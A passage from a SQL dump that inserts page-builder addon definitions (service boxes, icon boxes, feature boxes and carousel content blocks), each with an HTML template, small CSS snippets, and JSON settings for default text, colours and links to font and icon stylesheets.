(15, 'Service Box With Round Icon', 'service_box_with_round_icon_vc', 'service_box_with_round_icon', 'vc', '', 15, '{"html":"<div class=\\"uc_service_box_with_round_icon\\">\\n\\t\\t<span style=\\"background-color: {{color}}\\" class=\\"bbb\\"><\\/span>\\n\\t\\t<i class=\\"{{icon}} fa-fw uc_icon\\" style=\\"background-color:{{color}}\\"><\\/i>\\n\\t\\t<h4 class=\\"uc_title\\">{{box_title|raw}}<\\/h4>\\n\\t\\t<p class=\\"uc_content\\">{{description|raw}}<\\/p>\\n\\t\\t<a class=\\"uc_more\\" href=\\"{{button_link}}\\" style=\\"color: {{color}}\\">{{button_text|raw}}<\\/a>\\n\\t<\\/div>\\n\\t<!-- end of service box -->"}', '{"options":{"enable_items":"false","path_assets":"service_box_with_round_icon","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Box Title","name":"box_title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Description","name":"description","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras diam purus, sagittis quis augue et, dictum rhoncus ante. ","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","admin_label":"false","default_value":"Read More","font_editable":"true"},{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#c6437f"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/www.google.com"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-rocket"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"service_box_with_round_icon\\/service_box_with_round_icon.css","condition":""},{"url":"https:\\/\\/maxcdn.bootstrapcdn.com\\/font-awesome\\/4.5.0\\/css\\/font-awesome.min.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Raleway:400,700","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(16, 'Service Box Zoom Effect', 'service_box_zoom_effect_vc', 'service_box_zoom_effect', 'vc', '', 16, '{"html":"<div class=\\"uc_service_box_zoom_effect\\">\\n\\t\\t<div class=\\"uc_feature_box\\">\\n\\t\\t\\t<div class=\\"uc_feature_icon\\">\\n\\t\\t\\t\\t<i class=\\"{{icon}} uc_icon\\"><\\/i>\\n\\t\\t\\t<\\/div>\\n\\t\\t\\t<div class=\\"uc_feature_header\\">\\n\\t\\t\\t\\t<h4>{{title|raw}}<\\/h4>\\n\\t\\t\\t<\\/div>\\n\\t\\t\\t<div class=\\"uc_feature_info\\">\\n\\t\\t\\t\\t{{description|raw}}\\n\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t<\\/div>","css":".uc_service_box_zoom_effect .uc_feature_box:hover .uc_feature_icon > i.uc_icon{color:{{color}};}\\n.uc_service_box_zoom_effect .uc_feature_box .uc_feature_header > h4:hover{color:{{color}};}\\n.uc_service_box_zoom_effect .uc_feature_box .uc_feature_header > h4:after {border-color:{{color}};}"}', '{"options":{"enable_items":"false","path_assets":"service_box_zoom_effect","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Description","name":"description","description":"","admin_label":"false","default_value":"Vestibulum ante mauris, laoreet non tempus quis, vehicula nec massa.Cras consequat cursus sem ac ultrices.","font_editable":"true"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-file-text-o"},{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#0094e0"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"https:\\/\\/maxcdn.bootstrapcdn.com\\/font-awesome\\/4.6.1\\/css\\/font-awesome.min.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700|Open+Sans:400,700","condition":""},{"url":"service_box_zoom_effect\\/service_box_zoom_effect.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(17, 'Simple Icon Box', 'simple_icon_box_vc', 'simple_icon_box', 'vc', '', 17, '{"html":"<div class=\\"uc_simple_icon_box\\">\\n    \\t<div class=\\"simple_icon_box_container\\">\\n            <i class=\\"{{icon}}\\" aria-hidden=\\"true\\" style=\\"color:{{color}};\\"><\\/i>\\n            <h3>{{title|raw}}<\\/h3>\\n            <p>{{content|raw}}<\\/p>\\n            <a class=\\"readmore\\" href=\\"{{link}}\\">{{button|raw}}<\\/a>\\n        <\\/div>\\n    <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"simple_icon_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"true"},"params":[{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-wrench"},{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"false","default_value":"High Quality","font_editable":"true"},{"type":"uc_editor","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod aliquam ut laoreet dolore magna tincidunt.","font_editable":"true"},{"type":"uc_textfield","title":"Button","name":"button","description":"","admin_label":"false","default_value":"Read More","font_editable":"true"},{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#2f8cc5"},{"type":"uc_textfield","title":"Link","name":"link","description":"","admin_label":"false","default_value":"http:\\/\\/www.google.com","font_editable":"false"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"simple_icon_box\\/simple_icon_box.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,400italic,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(18, 'Simple Icon Content Box', 'simple_icon_content_box_vc', 'simple_icon_content_box', 'vc', '', 18, '{"html":"<div class=\\"uc_simple_icon_content_box\\" style=\\"background-color:{{bg_color}};\\">\\n        <div class=\\"uc_bottom_col\\">\\n            \\n                <div class=\\"uc_block_bottom\\">\\n                    <div class=\\"uc_icon\\">\\n                    \\t<i class=\\"{{icon_one}}\\" aria-hidden=\\"true\\"><\\/i>\\n                    <\\/div>\\n                    <div class=\\"uc_discription\\">                    \\t\\n                        <h2 class=\\"uc_brand1\\">{{title_one|raw}}<\\/h2>\\n                        <p>{{content_one|raw}}<\\/p>\\n                    <\\/div>\\n                    <div style=\\"clear:both;\\"><\\/div>\\n                <\\/div>\\n           \\n        <\\/div>\\n    <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"simple_icon_content_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title_one","description":"","admin_label":"true","default_value":"Title","font_editable":"true"},{"type":"uc_icon","title":"Icon","name":"icon_one","description":"","admin_label":"false","default_value":"fa fa-users"},{"type":"uc_textarea","title":"Content","name":"content_one","description":"","admin_label":"false","default_value":"This is Photoshop''s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet.","font_editable":"true"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#0ac5ff"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"simple_icon_content_box\\/simple_icon_content_box.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(19, 'Six Features', 'six_features_vc', 'six_features', 'vc', '', 19, '{"html":"<div class=\\"uc_six_features\\">\\n\\t\\t\\t<!--start of contain-->\\n\\t\\t\\t<div class=\\"uc_features_contain\\">\\n\\t\\t\\t\\t{{put_items()}}\\n\\t\\t\\t<\\/div>\\n\\t\\t\\t<!--end of contain-->\\n\\t\\t<\\/div>","html_item":"<div class=\\"uc_benefit_box\\">\\n  <div class=\\"uc_media\\">\\n    <div class=\\"uc_media-left\\">\\n      <span class=\\"uc_location\\"><i class=\\"{{item.icon}}\\"><\\/i><\\/span>\\n    <\\/div>\\n    <div class=\\"uc_media_body\\">\\n      <h4 class=\\"uc_tittle\\">{{item.title|raw}}<\\/h4>\\n      <p class=\\"uc_description|raw\\">{{item.content|raw}}<\\/p>\\n    <\\/div>\\n  <\\/div>\\n<\\/div>","css":".uc_six_features .uc_features_contain .uc_benefit_box .uc_media .uc_media-left .uc_location i{\\n\\n    color:{{icon_color}};\\n}"}', '{"options":{"enable_items":"true","path_assets":"six_features","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_colorpicker","title":"Icon Color","name":"icon_color","description":"","default_value":"#1f8eff"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"false","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore.","font_editable":"true"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-heart"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"six_features\\/six_features.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(20, 'Slick Icon Box', 'slick_icon_box_vc', 'slick_icon_box', 'vc', '', 20, '{"html":"<div class=\\"uc_slick_icon_box\\">\\n    \\t<div class=\\"slick_icon_box_container\\">\\n        \\t<span class=\\"bbb\\">\\n            <i class=\\"{{icon}} round\\" aria-hidden=\\"true\\"><\\/i>\\n            <\\/span>\\n            <h3>{{title|raw}}<\\/h3>\\n            <p>{{content|raw}}<\\/p>\\n            <a class=\\"readmore\\" href=\\"{{link}}\\">{{button|raw}}<\\/a>\\n        <\\/div>\\n    <\\/div>","css":".uc_slick_icon_box\\n{\\n\\tpadding-top:10px;\\n}"}', '{"options":{"enable_items":"false","path_assets":"slick_icon_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"High Quality","font_editable":"true"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-wrench"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod aliquam ut laoreet dolore magna tincidunt.","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"button","description":"","admin_label":"false","default_value":"Read More","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"https:\\/\\/www.google.com"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"slick_icon_box\\/slick_icon_box.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,400italic,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(21, 'Three Feature Boxes', 'three_feature_boxes_vc', 'three_feature_boxes', 'vc', '', 21, '{"html":"<ul class=\\"three_feature_boxes\\">\\n  {{put_items()}}\\n<\\/ul>","html_item":"<li style=\\"background-color: {{item.background}};\\">\\n    <div class=\\"headline\\">\\n      <h3>{{item.title|raw}}<\\/h3>\\n    <\\/div>\\n    <!-- headline -->\\n    \\n    <p>{{item.content|raw}}<\\/p>\\n  <a class=\\"btn\\" href=\\"{{item.link}}\\" btn-default=\\"\\"> {{item.link_txt|raw}} <i class=\\"fa fa-angle-right\\"><\\/i><\\/a> \\n<\\/li>"}', '{"options":{"enable_items":"true","path_assets":"three_feature_boxes","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":"","params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"false","default_value":"Creative Design","font_editable":"true"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Aliquam commodo arPhasellus sed metus at ligula tincidunt condimentum. Phasellus enim tortor, po suere a suscipit ac, molestie vel quam.","font_editable":"true"},{"type":"uc_textfield","title":"Link Text","name":"link_txt","description":"","admin_label":"false","default_value":"Read More","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","admin_label":"false","default_value":"http:\\/\\/www.google.com","font_editable":"false"},{"type":"uc_colorpicker","title":"Background","name":"background","description":"","admin_label":"false","default_value":"#20CFEF"}],"includes":{"js":[],"jslib":[],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Poppins:300,400,500,600,700","condition":""},{"url":"http:\\/\\/fortawesome.github.io\\/Font-Awesome\\/assets\\/font-awesome\\/css\\/font-awesome.css","condition":""},{"url":"three_feature_boxes\\/three_feature_boxes.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(22, 'Tiny Icon Box', 'tiny_icon_box_vc', 'tiny_icon_box', 'vc', '', 22, '{"html":"<div class=\\"uc_tiny_icon_box\\">\\n    \\t<div class=\\"tiny_icon_box_container\\">\\n            <i class=\\"{{icon}}\\" aria-hidden=\\"true\\"><\\/i>\\n            <div class=\\"tiny_icon_box_content\\">\\n                <h3>{{title|raw}}<\\/h3>\\n                <p>{{content|raw}}<\\/p>\\n                <a class=\\"readmore\\" href=\\"{{link}}\\">{{button|raw}}<\\/a>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"tiny_icon_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"High Quality","font_editable":"true"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-wrench"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod aliquam ut laoreet dolore magna tincidunt.","font_editable":"true"},{"type":"uc_textfield","title":"Link Text","name":"button","description":"","admin_label":"false","default_value":"read more","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"https:\\/\\/www.google.com"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"tiny_icon_box\\/tiny_icon_box.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,400italic,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL);
INSERT INTO `cyb_addonlibrary_addons` (`id`, `title`, `name`, `alias`, `addontype`, `description`, `ordering`, `templates`, `config`, `catid`, `is_active`, `test_slot1`, `test_slot2`, `test_slot3`) VALUES
(23, 'Classic Content', 'uc_classic_carousel_content_vc', 'uc_classic_carousel_content', 'vc', '', 23, '{"html":"<div class=\\"uc_classic_content\\" id=\\"{{uc_id}}\\">\\n    \\t<div class=\\"uc_classic_content_container_holder\\" style=\\"background-color:{{bg_color}};\\">\\n            <span class=\\"uc_classic_content_border\\" style=\\"background-color:{{border_color}};\\"><\\/span>\\n        \\t<div class=\\"uc_classic_content_placeholder\\">\\n        \\t\\t<img src=\\"{{image}}\\" alt=\\"\\">\\n            <\\/div>\\n            <div class=\\"uc_classic_content_content\\">\\n                <h2 style=\\"color:{{primary_color}};\\">{{title|raw}}<\\/h2>\\n                <p style=\\"color:{{primary_color}};\\">{{content|raw}}<\\/p>\\n                <a class=\\"uc_more_btn\\" style=\\"color:{{primary_color}}; border:{{btn_border}} 1px solid; background-color:{{bg_color}};\\" href=\\"{{link}}\\" target=\\"{{target}}\\">{{btn_text|raw}}<\\/a>\\n            <\\/div>\\n        <\\/div>\\n   <\\/div>","css":"#{{uc_id}} .uc_classic_content_content .uc_more_btn:hover \\n{\\n\\tcolor:{{btn_hvr_clr}} !important;\\n\\tborder:{{btn_hvr_clr}} 1px solid !important;\\n\\tbox-shadow:#d9dcdc 0px 6px 7px  ;\\n}"}', '{"options":{"enable_items":"false","path_assets":"uc_classic_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_colorpicker","title":"Border Top","name":"border_color","description":"","admin_label":"false","default_value":"#00d3ca"},{"type":"uc_colorpicker","title":"Button Hover Color","name":"btn_hvr_clr","description":"","admin_label":"false","default_value":"#00d3ca"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#ffffff"},{"type":"uc_image","title":"Image ","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/uc_classic_carousel_img1.jpg"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#181818"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, conse ctetur adipisicing elit, sed do eiusmod tempor incididunt ut...","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Show More","font_editable":"true"},{"type":"uc_colorpicker","title":"Button border","name":"btn_border","description":"","default_value":"#dcdedf"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"},{"type":"uc_radioboolean","title":"Link in new window","name":"target","description":"","admin_label":"false","default_value":"_blank","true_name":"Yes","true_value":"_blank","false_name":"No","false_value":"_self"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Droid+Serif","condition":""},{"url":"uc_classic_carousel_content\\/uc_classic_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(24, 'Clean Content', 'uc_clean_carousel_content_vc', 'uc_clean_carousel_content', 'vc', '', 24, '{"html":"<div class=\\"uc_clean_content\\">\\n            <div class=\\"uc_clean_content_container_holder\\" style=\\"background-color:{{bg_color}}; border-color:{{main_border_color}};\\">\\n                <span class=\\"uc_clean_content_left_corner\\" style=\\" border-color:{{corner_border}};\\"><\\/span>\\n                <div class=\\"uc_clean_content_content\\">\\n                \\t<i style=\\"color:{{icon_color}};\\" class=\\"{{icon}}\\"><\\/i>\\n                    <h2 style=\\"color:{{primary_color}};\\">{{title|raw}}<\\/h2>\\n                    <p style=\\"color:{{primary_color}};\\">{{content|raw}}<\\/p>\\n                    <a class=\\"uc_more_btn\\" style=\\"color:{{btn_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n                <\\/div>\\n                <span class=\\"uc_clean_content_right_corner\\" style=\\" border-color:{{corner_border}};\\"><\\/span>\\n            <\\/div>\\n   <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_clean_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Main Border Color","name":"main_border_color","description":"","default_value":"#ececec"},{"type":"uc_colorpicker","title":"Corner Border","name":"corner_border","description":"","default_value":"#22242a"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-clock-o"},{"type":"uc_colorpicker","title":"Icon Color","name":"icon_color","description":"","default_value":"#b2b5be"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#181818"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, conse ctetur adipisicing elit, sed do eiusmod tempor incididunt ut...","font_editable":"true"},{"type":"uc_textfield","title":"Button text","name":"btn_text","description":"","admin_label":"false","default_value":"Show More","font_editable":"true"},{"type":"uc_colorpicker","title":"Button Color","name":"btn_color","description":"","default_value":"#50dfa8"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"false","default_value":"Default Title"},{"type":"uc_editor","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, conse ctetur adipisicing elit, sed do eiusmod tempor incididunt ut..."},{"type":"uc_textfield","title":"Link","name":"link","description":"","admin_label":"false","default_value":"#"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-clock-o"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/maxcdn.bootstrapcdn.com\\/font-awesome\\/4.7.0\\/css\\/font-awesome.min.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Droid+Serif:400i,700i","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Droid+Serif:400i,700i","condition":""},{"url":"uc_clean_carousel_content\\/uc_clean_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(25, 'Color Content', 'uc_color_carousel_content_vc', 'uc_color_carousel_content', 'vc', '', 25, '{"html":"<div class=\\"uc_color_content\\">\\n       <div class=\\"uc_color_content_container_holder\\">\\n                <div class=\\"uc_color_content_placeholder\\">\\n                    <img src=\\"{{image}}\\" alt=\\"\\">\\n                <\\/div>\\n                <div class=\\"uc_color_content_content\\" style=\\"background:{{bg_color}};\\">\\n                    <h2 style=\\"color:{{text_color}};\\">{{title|raw}}<\\/h2>\\n                    <div class=\\"uc_paragraph\\" style=\\"color:{{text_color}};\\">{{content|raw}}<\\/div>\\n                    <a class=\\"uc_more_btn\\" style=\\"color:{{text_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n                <\\/div>\\n            <\\/div>\\t\\n   <\\/div>","css":".uc_color_content .uc_color_content_placeholder { background-color:none;}\\n.uc_color_content .uc_color_content_content{padding: 20px 19px;}"}', '{"options":{"enable_items":"false","path_assets":"uc_color_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Column Size","preview_size":"column","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/uc_color_carousel_img1.jpg"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#e85959"},{"type":"uc_colorpicker","title":"Text Color","name":"text_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"false","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, con","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Learn More","font_editable":"true"},{"type":"uc_textfield","title":"link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:300,400,600,700","condition":""},{"url":"uc_color_carousel_content\\/uc_color_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(26, 'Content Box Content', 'uc_content_box_content_vc', 'uc_content_box_content', 'vc', '', 26, '{"html":"<div class=\\"uc_content_content\\" style=\\"background-color:{{bg_color}};\\"> \\n    <div class=\\"uc_content-table\\">\\n       <section class=\\"uc_section_bgw\\"> \\n            <div class=\\"uc_container\\">\\n                <div class=\\"uc_box_section\\">\\n                    <div class=\\"uc-item\\">\\n                    \\t<div class=\\"uc_boxes\\">\\n                            <div class=\\"uc_entry\\">\\n                                <img class=\\"img-responsive img-rounded\\" alt=\\"\\" src=\\"{{image}}\\">\\n                                <div class=\\"uc_magnifier\\">\\n                                     <div class=\\"uc_shop-bottom clearfix\\">\\n                                         <a title=\\"\\" href=\\"{{link}}\\">\\n                                         \\t<i style=\\"background-color:{{icon_bg_color}};\\" class=\\"{{icon}} uc_btn-radius\\"><\\/i>\\n                                         <\\/a>\\n                                     <\\/div>\\n                                 <\\/div>\\n                             <\\/div>       \\n                             <h3>{{title|raw}}<\\/h3>\\n                             <p>{{content|raw}}<\\/p>\\n                         <\\/div>\\n                    <\\/div>\\n                <\\/div>\\n            <\\/div> \\n       <\\/section>             \\n    <\\/div>        \\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_content_box_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Column Size","preview_size":"column","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"sampel Title","font_editable":"true"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"This is some default text for an example of the addon and how it will look like.","font_editable":"true"},{"type":"uc_image","title":"Iamge","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/uc_overlap_carousel_img1.jpg"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#ffffff"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-plus"},{"type":"uc_colorpicker","title":"Icon Background Color","name":"icon_bg_color","description":"","default_value":"#3ca1db"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Roboto:400,900italic,900,700italic,700,500italic,500,400italic,300italic,300,100italic,100","condition":""},{"url":"uc_content_box_content\\/uc_content_box_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(27, 'Dark Content', 'uc_dark_carousel_content_vc', 'uc_dark_carousel_content', 'vc', '', 27, '{"html":"<div class=\\"uc_dark_content\\">\\n  <div class=\\"uc_dark_content_container_holder\\">\\n    <div class=\\"uc_dark_content_placeholder\\">\\n      <img src=\\"{{image}}\\" alt=\\"\\">\\n    <\\/div>\\n    <div class=\\"uc_dark_content_content\\" style=\\"background-color:{{bg_color}};\\">\\n      <h2 style=\\"color:{{primary_color}};\\">{{title|raw}}<\\/h2>\\n      <p style=\\"color:{{primary_color}};\\">{{content|raw}}<\\/p>\\n      <a class=\\"uc_more_btn\\" style=\\"color:{{primary_color}}; border:{{btn_border_color}} 1px solid; background-color:{{btn_bg}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n    <\\/div>\\n  <\\/div>\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_dark_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title goes here","font_editable":"true"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/uc_dark_carousel_img1.jpg"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#3a444e"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#ffffff"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipisi cing elit, sed do eius mod tempor incididunt ut \\nlabore et dolore magna aliqua.","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Read More","font_editable":"true"},{"type":"uc_colorpicker","title":"Button Background","name":"btn_bg","description":"","default_value":"#3a444e"},{"type":"uc_colorpicker","title":"Button 